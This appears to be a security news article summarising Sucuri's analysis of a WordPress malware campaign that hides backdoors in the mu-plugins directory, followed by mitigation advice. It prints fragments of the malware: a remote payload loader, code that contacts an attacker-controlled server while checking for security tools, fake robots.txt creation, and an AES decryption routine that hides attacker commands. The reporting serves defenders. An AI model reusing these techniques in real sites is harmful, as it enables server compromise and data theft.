A sophisticated malware campaign has recently been uncovered by security researchers at Sucuri, targeting WordPress websites through hidden malware and backdoors in the mu-plugins directory.
This attack chain allows remote execution of malicious code, enabling full server compromise, data theft, and persistent control over infected sites.
The /wp-content/mu-plugins/ directory – designed for “must-use” plugins that load automatically – became the attack vector. Threat actors planted a file named index.php containing obfuscated PHP code:
'.$final);
?>When decoded, this retrieves and executes payloads from /wp-content/uploads/2024/12/index.txt.
Besides this, the security analysts at Sucuri noted that the second-stage payload contains advanced features:-
- Server Communication
$xmlname = urldecode('162-er103-1.ivyrebl.fvgr');
$http = is_https() ? 'https' : 'http';
$web = $http.'://'.$goweb.'/index.php?web='.$host.'&zz='.(disbot() ? '1' : '0');Masks communications with attacker-controlled servers while checking for security tools.
- Robots.txt Manipulation
$robotsPath = $_SERVER['DOCUMENT_ROOT'].'/robots.txt';
if (!file_exists($robotsPath)) {
file_put_contents($robotsPath, "User-agent: *nAllow: /nSitemap: ...");
}Creates fake sitemaps to boost malicious SEO campaigns.
Advanced Persistence Mechanisms
A second backdoor (test-muplugin.php) employed AES-128-CBC encryption for payload delivery:-
$_7a5b = "l2UDM/1kihg+Pd50dO3hKCkDZKCBzafIvVT20a6iA3JU8Hmvdc+zphRj...";
function zwxyb($_7a5b, $_11f9) {
return openssl_decrypt($_7a5b, 'AES-128-CBC', substr(hash('sha256', $_11f9, true), 0, 16), 0, ...);
}This decrypts attacker commands while evading signature-based detection.
A newly discovered malware campaign is compromising WordPress websites through credential stuffing and phishing attacks, leading to backdoor installations in the mu-plugins directory with encrypted payloads.
Once inside, the malware spreads laterally between servers, executing threats such as cryptominers, ransomware, or data exfiltration.
To mitigate this risk, website owners should enforce file integrity monitoring by blocking PHP execution in upload directories, reset all admin, FTP, and database credentials, and implement web application firewalls with mu-plugins monitoring.
This campaign shows the importance of continuous WordPress security hardening, including disabling unused directories and conducting real-time malware scans, as 68% of infections stem from outdated components.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free